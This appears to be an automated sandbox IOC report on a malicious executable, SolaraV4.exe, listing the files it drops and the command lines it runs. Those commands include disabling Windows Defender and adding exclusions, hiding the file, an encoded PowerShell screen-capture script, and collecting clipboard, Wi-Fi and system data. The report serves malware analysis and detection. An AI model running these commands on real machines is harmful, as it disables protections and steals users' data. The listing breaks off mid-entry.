IOC Report
SolaraV4.exe

loading gif

Files

File Path
Type
Category
Malicious
SolaraV4.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Local\Temp\6zHpy.zip
RAR archive data, v5
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71122\rar.exe
PE32+ executable (console) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI71122\rarreg.key
ASCII text
dropped
malicious
C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.cmdline
Unicode text, UTF-8 (with BOM) text, with very long lines (604), with no line terminators
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0x076e4237, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
Microsoft Cabinet archive data, Windows 2000/XP setup, 4770 bytes, 1 file, at 0x2c +A "disallowedcert.stl", number 1, 1 datablock, 0x1 compression
dropped
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
modified
C:\Users\user\AppData\Local\Temp\?? ?? ?? \Display (1).png
PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
dropped
C:\Users\user\AppData\Local\Temp\MpCmdRun.log
Unicode text, UTF-16, little-endian text, with CRLF line terminators
modified
C:\Users\user\AppData\Local\Temp\RES6CAA.tmp
Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4b6, 9 symbols, created Fri Oct 4 14:41:27 2024, 1st section name ".debug$S"
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\VCRUNTIME140.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\_bz2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\_ctypes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\_decimal.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\_hashlib.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\_lzma.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\_queue.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\_socket.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\_sqlite3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\_ssl.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\base_library.zip
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\blank.aes
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\libcrypto-1_1.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\libffi-7.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\libssl-1_1.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\python310.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\select.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\sqlite3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI71122\unicodedata.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0qtnxjh5.5mo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2reh1hlc.zqs.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3q22mtuh.xzi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5ypwtd2b.let.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c45uvxbf.m5a.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_d0adcpft.wrx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dcqyrpsp.w2j.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ddmc2lig.wcz.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eilf4dbd.oue.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fpmzccm5.zak.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gr5f3ipy.huo.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hgl5ffwh.fj3.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_khkqdrir.1p3.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kyj4lt2p.sqc.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m5zlqc1v.031.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n4bgagsm.pzg.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ooeisrmc.w2w.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgrzdtzj.mpn.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qezdlmk5.q13.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qyg0jbdv.erh.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vdhmt134.uo4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xfazwxln.4c4.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrdymmba.ywc.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zjyne2um.tlx.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\myx0gned\CSC193A8B703A1D4F08B0E861F82E42C2AF.TMP
MSVC .res
dropped
C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.0.cs
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.dll
PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.out
Unicode text, UTF-8 (with BOM) text, with very long lines (708), with CRLF, CR line terminators
modified
C:\Windows\Logs\SIH\SIH.20241004.091653.335.1.etl
data
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\TMPF080.tmp
Microsoft Cabinet archive data, single, 462 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 31944, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
dropped
C:\Windows\SoftwareDistribution\SLS\522D76A4-93E1-47F8-B8CE-07C937AD1A1E\sls.cab
Microsoft Cabinet archive data, single, 7826 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 53283, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
dropped
C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\TMPF88B.tmp
Microsoft Cabinet archive data, single, 858 bytes, 1 file, at 0x44 +Utf "environment.xml", flags 0x4, ID 12183, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
modified
C:\Windows\SoftwareDistribution\SLS\E7A50285-D08D-499D-9FF8-180FDC2332BC\sls.cab
Microsoft Cabinet archive data, single, 11149 bytes, 1 file, at 0x44 +Utf "environment.cab", flags 0x4, ID 18779, number 1, extra bytes 20 in head, 1 datablock, 0x1 compression
dropped
C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
data
dropped
\Device\ConDrv
ASCII text, with CRLF line terminators
dropped
There are 59 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\SolaraV4.exe
"C:\Users\user\Desktop\SolaraV4.exe"
malicious
C:\Users\user\Desktop\SolaraV4.exe
"C:\Users\user\Desktop\SolaraV4.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Please update software. OLD VERSION', 0, 'Error', 32+16);close()""
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SolaraV4.exe'
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic csproduct get uuid
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
malicious
C:\Windows\System32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
malicious
C:\Windows\System32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic path win32_VideoController get name
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
malicious
C:\Windows\System32\wbem\WMIC.exe
wmic path win32_VideoController get name
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe""
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"
malicious
C:\Windows\System32\attrib.exe
attrib +h +s "C:\Users\user\Desktop\SolaraV4.exe"
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "systeminfo"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-Clipboard
malicious
C:\Windows\System32\netsh.exe
netsh wlan show profile
malicious
C:\Windows\System32\systeminfo.exe
systeminfo
malicious
C:\Windows\System32\reg.exe
REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
malicious
C:\Windows\System32\wbem\WMIC.exe
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
malicious
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\myx0gned\myx0gned.cmdline"
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\attrib.exe
attrib -r C:\Windows\System32\drivers\etc\hosts
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "getmac"
malicious
C:\Windows\System32\getmac.exe
getmac
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tree /A /F"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
malicious
C:\Windows\System32\tree.com
tree /A /F
malicious
C:\Windows\System32\attrib.exe
attrib +r C:\Windows\System32\drivers\etc\hosts
malicious
C:\Windows\System32\cmd.exe
